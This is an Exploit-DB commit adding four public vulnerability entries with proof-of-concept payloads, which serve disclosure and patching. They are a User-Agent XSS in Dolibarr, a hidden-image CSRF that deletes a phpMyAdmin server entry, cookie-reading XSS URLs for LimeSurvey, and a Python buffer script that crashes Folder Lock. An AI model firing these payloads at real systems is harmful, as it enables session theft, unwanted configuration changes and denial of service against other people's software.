DB: 2019-09-14

4 changes to exploits/shellcodes

Folder Lock 7.7.9 - Denial of Service
Dolibarr ERP-CRM 10.0.1 - 'User-Agent' Cross-Site Scripting
phpMyAdmin 4.9.0.1 - Cross-Site Request Forgery
LimeSurvey 3.17.13 - Cross-Site Scripting
This commit is contained in:
Offensive Security 2019-09-14 05:02:28 +00:00
parent c0ce31079a
commit d154146052
5 changed files with 277 additions and 0 deletions

View file

@ -0,0 +1,20 @@
# Exploit Title: Dolibarr ERP/CRM 10.0.1 - User-Agent Http Header Cross
Site Scripting
# Exploit Author: Metin Yunus Kandemir (kandemir)
# Vendor Homepage: https://www.dolibarr.org/
# Software Link: https://www.dolibarr.org/downloads
# Version: 10.0.1
# Category: Webapps
# Tested on: Xampp for Linux
# CVE: CVE-2019-16197
# Software Description : Dolibarr ERP & CRM is a modern and easy to use
software package to manage your business...
==================================================================
Description: In htdocs/societe/card.php in Dolibarr 10.0.1, the value of
the User-Agent HTTP header is copied into the HTML document as plain text
between tags, leading to XSS.
GET /dolibarr-10.0.1/htdocs/societe/card.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0ab<script>alert("XSS")</script>

View file

@ -0,0 +1,79 @@
=============================================
MGC ALERT 2019-003
- Original release date: June 13, 2019
- Last revised: September 13, 2019
- Discovered by: Manuel Garcia Cardenas
- Severity: 4,3/10 (CVSS Base Score)
- CVE-ID: CVE-2019-12922
=============================================
I. VULNERABILITY
-------------------------
phpMyAdmin 4.9.0.1 - Cross-Site Request Forgery
II. BACKGROUND
-------------------------
phpMyAdmin is a free software tool written in PHP, intended to handle the
administration of MySQL over the Web. phpMyAdmin supports a wide range of
operations on MySQL and MariaDB.
III. DESCRIPTION
-------------------------
Has been detected a Cross-Site Request Forgery in phpMyAdmin, that allows
an attacker to trigger a CSRF attack against a phpMyAdmin user deleting any
server in the Setup page.
IV. PROOF OF CONCEPT
-------------------------
Exploit CSRF - Deleting main server
<p>Deleting Server 1</p>
<img src="
http://server/phpmyadmin/setup/index.php?page=servers&mode=remove&id=1"
style="display:none;" />
V. BUSINESS IMPACT
-------------------------
The attacker can easily create a fake hyperlink containing the request that
wants to execute on behalf the user,in this way making possible a CSRF
attack due to the wrong use of HTTP method.
VI. SYSTEMS AFFECTED
-------------------------
phpMyAdmin <= 4.9.0.1
VII. SOLUTION
-------------------------
Implement in each call the validation of the token variable, as already
done in other phpMyAdmin requests.
VIII. REFERENCES
-------------------------
https://www.phpmyadmin.net/
IX. CREDITS
-------------------------
This vulnerability has been discovered and reported
by Manuel Garcia Cardenas (advidsec (at) gmail (dot) com).
X. REVISION HISTORY
-------------------------
June 13, 2019 1: Initial release
September 13, 2019 2: Last revision
XI. DISCLOSURE TIMELINE
-------------------------
June 13, 2019 1: Vulnerability acquired by Manuel Garcia Cardenas
June 13, 2019 2: Send to vendor
July 16, 2019 3: New request to vendor without fix date
September 13, 2019 4: Sent to lists
XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
XIII. ABOUT
-------------------------
Manuel Garcia Cardenas
Pentester

View file

@ -0,0 +1,146 @@
SEC Consult Vulnerability Lab Security Advisory < 20190912-0 >
=======================================================================
title: Stored and reflected XSS vulnerabilities
product: LimeSurvey
vulnerable version: <= 3.17.13
fixed version: =>3.17.14
CVE number: CVE-2019-16172, CVE-2019-16173
impact: medium
homepage: https://www.limesurvey.org/
found: 2019-08-23
by: Andreas Kolbeck (Office Munich)
David Haintz (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Europe | Asia | North America
https://www.sec-consult.com
=======================================================================
Vendor description:
-------------------
"LimeSurvey is the tool to use for your online surveys. Whether you are
conducting simple questionnaires with just a couple of questions or advanced
assessments with conditionals and quota management, LimeSurvey has got you
covered. LimeSurvey is 100% open source and will always be transparently developed.
We can help you reach your goals."
Source: https://www.limesurvey.org/
Business recommendation:
------------------------
LimeSurvey suffered from a vulnerability due to improper input
and output validation. By exploiting this vulnerability an attacker could:
1. Attack other users of the web application with JavaScript code,
browser exploits or Trojan horses, or
2. perform unauthorized actions in the name of another logged-in user.
The vendor provides a patch which should be installed immediately.
Furthermore, a thorough security analysis is highly recommended as only a
short spot check has been performed and additional issues are to be expected.
Vulnerability overview/description:
-----------------------------------
1) Stored and reflected XSS vulnerabilities
LimeSurvey suffers from a stored and reflected cross-site scripting vulnerability,
which allows an attacker to execute JavaScript code with the permissions of the victim.
In this way it is possible to escalate privileges from a low-privileged account e.g.
to "SuperAdmin".
Proof of concept:
-----------------
1) Stored and reflected XSS vulnerabilities
Example 1 - Stored XSS (CVE-2019-16172):
The attacker needs the appropriate permissions in order to create new survey groups.
Then create a survey group with a JavaScript payload in the title, for example:
test<svg/onload=alert(document.cookie)>
When the survey group is being deleted, e.g. by an administrative user, the JavaScript
code will be executed as part of the "success" message.
Example 2 - Reflected XSS (CVE-2019-16173):
The following proof of concept prints the current CSRF token cookie which contains the
CSRF token. The parameter "surveyid" is not filtered properly:
http://$host/index.php/admin/survey?mandatory=1&sid=xxx&surveyid=xxx%22%3E%3Cimg%20
src=x%20onerror=%22alert(document.cookie)%22%3E&sa=listquestions&sort=question
If the URL schema is configured differently the following payload works:
http://$host/index.php?r=admin/survey&mandatory=1&sid=xxx&surveyid=
xxx"><img%20src=x%20onerror="alert(document.cookie)">&sa=listquestions&sort=question
Vulnerable / tested versions:
-----------------------------
The vulnerabilities have been verified to exist in version 3.17.9 and the latest
version 3.17.13. It is assumed that older versions are affected as well.
Vendor contact timeline:
------------------------
2019-08-29: Contacting vendor through https://bugs.limesurvey.org/view.php?id=15204
2019-09-02: Fixes available:
https://github.com/LimeSurvey/LimeSurvey/commit/32d6a5224327b246ee3a2a08500544e4f80f9a9a
https://github.com/LimeSurvey/LimeSurvey/commit/f1c1ad2d24eb262363511fcca2e96ce737064006
2019-09-02: Release of LimeSurvey v3.17.14 which fixes the security issues
2019-09-03: Release of LimeSurvey v3.17.15 bug fix
2019-09-12: Coordinated release of security advisory
Solution:
---------
Update to version 3.17.15 or higher:
https://www.limesurvey.org/stable-release
The vendor provides a detailed list of changes here:
https://www.limesurvey.org/limesurvey-updates/2188-limesurvey-3-17-14-build-190902-released
Workaround:
-----------
No workaround available.
Advisory URL:
-------------
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Europe | Asia | North America
About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/career/index.html
Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/contact/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult
EOF A. Kolbeck / @2019

28
exploits/windows/dos/47383.py Executable file
View file

@ -0,0 +1,28 @@
# Exploit Title: Folder Lock v7.7.9 Denial of Service Exploit
# Date: 12.09.2019
# Vendor Homepage:https://www.newsoftwares.net/folderlock/
# Software Link: https://www.newsoftwares.net/download/folderlock7-en/folder-lock-en.exe
# Exploit Author: Achilles
# Tested Version: 7.7.9
# Tested on: Windows 7 x64
# 1.- Run python code :Folder_Lock.py
# 2.- Open EVIL.txt and copy content to clipboard
# 3.- Open Folderlock and Click 'Enter Key'
# 4.- Paste the content of EVIL.txt into the Field: 'Serial Number and Registration Key'
# 5.- Click 'Submit' and you will see a crash.
#!/usr/bin/env python
buffer = "\x41" * 6000
try:
f=open("Evil.txt","w")
print "[+] Creating %s bytes evil payload.." %len(buffer)
f.write(buffer)
f.close()
print "[+] File created!"
except:
print "File cannot be created"

View file

@ -6559,6 +6559,7 @@ id,file,description,date,author,type,platform,port
47328,exploits/windows/dos/47328.py,"VX Search Enterprise 10.4.16 - 'User-Agent' Denial of Service",2019-08-30,"James Chamberlain",dos,windows,
47381,exploits/windows/dos/47381.txt,"Microsoft DirectWrite - Invalid Read in SplicePixel While Processing OTF Fonts",2019-09-12,"Google Security Research",dos,windows,
47382,exploits/windows/dos/47382.txt,"Microsoft DirectWrite - Out-of-Bounds Read in sfac_GetSbitBitmap While Processing TTF Fonts",2019-09-12,"Google Security Research",dos,windows,
47383,exploits/windows/dos/47383.py,"Folder Lock 7.7.9 - Denial of Service",2019-09-13,Achilles,dos,windows,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -41728,3 +41729,6 @@ id,file,description,date,author,type,platform,port
47373,exploits/php/webapps/47373.txt,"WordPress Plugin Photo Gallery 1.5.34 - Cross-Site Scripting (2)",2019-09-10,MTK,webapps,php,80
47379,exploits/java/webapps/47379.py,"AVCON6 systems management platform - OGNL Remote Command Execution",2019-09-11,"Nassim Asrir",webapps,java,
47380,exploits/hardware/webapps/47380.py,"eWON Flexy - Authentication Bypass",2019-09-11,Photubias,webapps,hardware,
47384,exploits/php/webapps/47384.txt,"Dolibarr ERP-CRM 10.0.1 - 'User-Agent' Cross-Site Scripting",2019-09-13,"Metin Yunus Kandemir",webapps,php,
47385,exploits/php/webapps/47385.txt,"phpMyAdmin 4.9.0.1 - Cross-Site Request Forgery",2019-09-13,"Manuel García Cárdenas",webapps,php,80
47386,exploits/php/webapps/47386.txt,"LimeSurvey 3.17.13 - Cross-Site Scripting",2019-09-13,"SEC Consult",webapps,php,80

Can't render this file because it is too large.